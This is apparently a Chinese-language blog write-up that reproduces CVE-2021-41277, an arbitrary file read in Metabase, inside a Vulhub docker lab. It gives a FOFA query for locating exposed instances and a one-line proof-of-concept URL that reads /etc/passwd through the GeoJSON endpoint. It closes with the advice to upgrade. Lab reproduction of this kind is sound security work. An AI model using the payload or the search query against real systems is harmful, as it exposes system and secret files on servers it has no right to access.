本来说最近安心备赛的,但看到官方的国庆活动又跑回来写文章了。萌新起步,如有不对欢迎大佬多多指导。
文章目录
-
漏洞信息
-
fofa语法
-
环境搭建
- POC
- 漏洞复现
- 总结
漏洞信息
Metabase是美国Metabase公司的一个开源数据分析平台。
Metabase 中存在信息泄露漏洞,该漏洞源于产品的 admin->settings->maps->custom maps->add a map 操作缺少权限验证。攻击者可通过该漏洞获得敏感信息。
- CNNVD编号:CNNVD-202111-1565
- 危害等级: 超危
- CVE编号: CVE-2021-41277
- 简述: 在受影响的版本中,自定义GeoJSON地图(' admin->settings->maps->custom maps->add a map ')存在本地文件包含(包括环境变量)漏洞,url在加载之前没有经过验证,攻击者利用该漏洞能够读取任意文件。
影响版本
组件 | 影响版本 | 安全版本 |
---|---|---|
metabase:metabase | >=1.0.0 & <1.40.5 | >=1.40.5 |
metabase:metabase | <0.40.5 | >= 0.40.5 |
fofa搜索语法
app="Metabase"
环境搭建
- 进入目标目录:cd /root/桌面/vulhub-master/metabase/CVE-2021-41277/
- 打开dockers容器:docker-compose up -d
- 查看主机IP地址:ifconfig
- 查看容器开启的端口:docker ps
- 地址加端口查看服务:http://192.168.162.129:3000
示例:
注册一个账号:(邮箱什么的随便输入就行了)
示例:
跳过数据库填写:
最后一步完成操作,然后进入这个页面:
示例:
POC:
http://your-ip:3000/api/geojson?url=file:etc/passwd
漏洞复现
打开抓包软件,对输入poc的页面进行抓包,并发送数据包即可达成任意文件读取的目的。
示例:
至此复现结束
总结及修复建议
修复建议:根据影响版本的信息查看,并升级到最新版本
总结:又是一次复现,日常求关注,欢迎各位大佬指点。谢谢。